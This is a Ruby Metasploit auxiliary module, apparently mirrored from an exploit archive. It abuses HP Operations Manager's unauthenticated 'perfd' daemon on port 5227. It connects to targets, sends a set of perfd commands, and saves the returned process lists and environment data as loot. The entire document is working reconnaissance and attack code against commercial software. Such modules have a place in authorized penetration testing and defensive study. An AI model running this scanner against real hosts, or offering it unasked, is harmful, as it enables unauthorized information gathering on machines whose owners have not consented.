Share
## https://sploitus.com/exploit?id=PACKETSTORM:180689
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
# TODO: figure out what these do:  
# o: valid command, takes no args, does nothing  
# B, c, F, G, I, M, U, x: all require an "instance id" and possibly other args  
ALLOWED_COMMANDS = %w(a A i g l p t T u w Z)  
  
def initialize  
super(  
'Name' => 'HP Operations Manager Perfd Environment Scanner',  
'Description' => %q{  
This module will enumerate the process list of a remote machine by abusing  
HP Operation Manager's unauthenticated 'perfd' daemon.  
},  
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],  
'License' => MSF_LICENSE  
)  
  
commands_help = ALLOWED_COMMANDS.join(',')  
register_options(  
[  
Opt::RPORT(5227),  
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])  
])  
end  
  
def commands  
datastore['COMMANDS'].split(/[, ]+/).map(&:strip)  
end  
  
def setup  
super  
if datastore['COMMANDS']  
bad_commands = commands - ALLOWED_COMMANDS  
unless bad_commands.empty?  
fail ArgumentError, "Bad perfd command(s): #{bad_commands}"  
end  
end  
end  
  
def run_host(target_host)  
begin  
  
connect  
banner_resp = sock.get_once  
if banner_resp && banner_resp =~ /^Welcome to the perfd server/  
banner_resp.strip!  
print_good("#{target_host}:#{rport}, Perfd server banner: #{banner_resp}")  
perfd_service = report_service(host: rhost, port: rport, name: "perfd", proto: "tcp", info: banner_resp)  
sock.puts("\n")  
  
commands.each do |command|  
sock.puts("#{command}\n")  
Rex.sleep(1)  
command_resp = sock.get_once  
  
loot_name = "HP Ops Agent perfd #{command}"  
path = store_loot(  
"hp.ops.agent.perfd.#{command}",  
'text/plain',  
target_host,  
command_resp,  
nil,  
"HP Ops Agent perfd #{command}",  
perfd_service  
)  
print_status("#{target_host}:#{rport} - #{loot_name} saved in: #{path}")  
end  
else  
print_error("#{target_host}:#{rport}, Perfd server banner detection failed!")  
end  
disconnect  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue Timeout::Error => e  
print_error(e.message)  
end  
end  
end